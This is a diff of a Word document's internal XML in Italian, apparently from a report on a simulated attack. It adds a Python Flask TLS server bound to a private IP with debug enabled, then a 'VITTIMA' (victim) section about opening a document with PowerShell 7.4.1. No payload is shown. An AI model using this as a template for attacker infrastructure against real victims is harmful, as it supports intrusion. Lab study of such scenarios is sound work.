+        <w:rPr>
+          <w:color w:val="FF0000"/>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t># Imposta l'indirizzo IP del server</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    SERVER_ADDRESS = ('192.168.1.10', 12345)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    # Carica i file del certificato e della chiave privata</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>ssl_context</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> = </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>ssl.SSLContext</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>ssl.PROTOCOL_TLS_SERVER</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>ssl_</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>context.load</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>_cert_chain</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>certfile</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>='</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>cert.pem</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">', </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>keyfile</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>='</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>key.pem</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>')</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    # Avvia il server </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t>Flask</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> con SSL abilitato</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>app.run</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>(host=SERVER_</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>ADDRESS[</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">0], port=SERVER_ADDRESS[1], </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>ssl_context</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>=</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>ssl_context</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>, debug=True)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
           <w:lang w:val="it-IT"/>
         </w:rPr>
         <w:t>VITTIMA</w:t>
@@ -3272,14 +4476,7 @@
         <w:rPr>
           <w:lang w:val="it-IT"/>
         </w:rPr>
-        <w:t xml:space="preserve">per </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t>permettere l’apertura del document</w:t>
+        <w:t>per permettere l’apertura del document</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -3304,6 +4501,50 @@
           <w:lang w:val="it-IT"/>
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t xml:space="preserve">La versione di </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t>powershell</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> usata è la 7.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t>4</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t>1</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t xml:space="preserve">. </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -4851,18 +6092,10 @@
 </file>
 
 <file path=customXml/item1.xml><?xml version="1.0" encoding="utf-8"?>
-<p:properties xmlns:p="http://schemas.microsoft.com/office/2006/metadata/properties" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:pc="http://schemas.microsoft.com/office/infopath/2007/PartnerControls">
-  <documentManagement>
-    <_activity xmlns="b8df6df5-3fad-46ca-9360-c9ec0c0b036b" xsi:nil="true"/>
-  </documentManagement>
-</p:properties>
+<b:Sources xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" SelectedStyle="\APASixthEditionOfficeOnline.xsl" StyleName="APA" Version="6"/>
 </file>
 
 <file path=customXml/item2.xml><?xml version="1.0" encoding="utf-8"?>
-<b:Sources xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" SelectedStyle="\APASixthEditionOfficeOnline.xsl" StyleName="APA" Version="6"/>
-</file>
-
-<file path=customXml/item3.xml><?xml version="1.0" encoding="utf-8"?>
 <ct:contentTypeSchema xmlns:ct="http://schemas.microsoft.com/office/2006/metadata/contentType" xmlns:ma="http://schemas.microsoft.com/office/2006/metadata/properties/metaAttributes" ct:_="" ma:_="" ma:contentTypeName="Documento" ma:contentTypeID="0x01010003AD22B01210FE489D9BE433888FACA9" ma:contentTypeVersion="16" ma:contentTypeDescription="Creare un nuovo documento." ma:contentTypeScope="" ma:versionID="09fad2276ea52fc6ec20be57fa2916a4">
   <xsd:schema xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:p="http://schemas.microsoft.com/office/2006/metadata/properties" xmlns:ns3="b8df6df5-3fad-46ca-9360-c9ec0c0b036b" xmlns:ns4="f1c65361-0737-4e30-bb3a-9e2ed6feafec" targetNamespace="http://schemas.microsoft.com/office/2006/metadata/properties" ma:root="true" ma:fieldsID="2cd1dbdccf64e950842932f53b8e29c6" ns3:_="" ns4:_="">
     <xsd:import namespace="b8df6df5-3fad-46ca-9360-c9ec0c0b036b"/>
@@ -5103,7 +6336,7 @@
 </ct:contentTypeSchema>
 </file>
 
-<file path=customXml/item4.xml><?xml version="1.0" encoding="utf-8"?>
+<file path=customXml/item3.xml><?xml version="1.0" encoding="utf-8"?>
 <?mso-contentType ?>
 <FormTemplates xmlns="http://schemas.microsoft.com/sharepoint/v3/contenttype/forms">
   <Display>DocumentLibraryForm</Display>
@@ -5112,17 +6345,15 @@
 </FormTemplates>
 </file>
 
-<file path=customXml/itemProps1.xml><?xml version="1.0" encoding="utf-8"?>
-<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{2E3BB391-AD20-4994-9E9B-D3F6C61061F0}">
-  <ds:schemaRefs>
-    <ds:schemaRef ds:uri="http://schemas.microsoft.com/office/2006/metadata/properties"/>
-    <ds:schemaRef ds:uri="http://schemas.microsoft.com/office/infopath/2007/PartnerControls"/>
-    <ds:schemaRef ds:uri="b8df6df5-3fad-46ca-9360-c9ec0c0b036b"/>
-  </ds:schemaRefs>
-</ds:datastoreItem>
+<file path=customXml/item4.xml><?xml version="1.0" encoding="utf-8"?>
+<p:properties xmlns:p="http://schemas.microsoft.com/office/2006/metadata/properties" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:pc="http://schemas.microsoft.com/office/infopath/2007/PartnerControls">
+  <documentManagement>
+    <_activity xmlns="b8df6df5-3fad-46ca-9360-c9ec0c0b036b" xsi:nil="true"/>
+  </documentManagement>
+</p:properties>
 </file>
 
-<file path=customXml/itemProps2.xml><?xml version="1.0" encoding="utf-8"?>
+<file path=customXml/itemProps1.xml><?xml version="1.0" encoding="utf-8"?>
 <ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{38D7A4B1-5AA0-4687-ADA6-A38D425A54D8}">
   <ds:schemaRefs>
     <ds:schemaRef ds:uri="http://schemas.openxmlformats.org/officeDocument/2006/bibliography"/>
@@ -5130,7 +6361,7 @@
 </ds:datastoreItem>
 </file>
 
-<file path=customXml/itemProps3.xml><?xml version="1.0" encoding="utf-8"?>
+<file path=customXml/itemProps2.xml><?xml version="1.0" encoding="utf-8"?>
 <ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{F74C8422-D422-4F67-B8D4-238A7F7173C7}">
   <ds:schemaRefs>
     <ds:schemaRef ds:uri="http://schemas.microsoft.com/office/2006/metadata/contentType"/>
@@ -5149,10 +6380,20 @@
 </ds:datastoreItem>
 </file>
 
-<file path=customXml/itemProps4.xml><?xml version="1.0" encoding="utf-8"?>
+<file path=customXml/itemProps3.xml><?xml version="1.0" encoding="utf-8"?>
 <ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{859E04BA-8E15-4F75-971E-EF4D12FD5774}">
   <ds:schemaRefs>
     <ds:schemaRef ds:uri="http://schemas.microsoft.com/sharepoint/v3/contenttype/forms"/>
   </ds:schemaRefs>
 </ds:datastoreItem>
+</file>
+
+<file path=customXml/itemProps4.xml><?xml version="1.0" encoding="utf-8"?>
+<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{2E3BB391-AD20-4994-9E9B-D3F6C61061F0}">
+  <ds:schemaRefs>
+    <ds:schemaRef ds:uri="http://schemas.microsoft.com/office/2006/metadata/properties"/>
+    <ds:schemaRef ds:uri="http://schemas.microsoft.com/office/infopath/2007/PartnerControls"/>
+    <ds:schemaRef ds:uri="b8df6df5-3fad-46ca-9360-c9ec0c0b036b"/>
+  </ds:schemaRefs>
+</ds:datastoreItem>
 </file>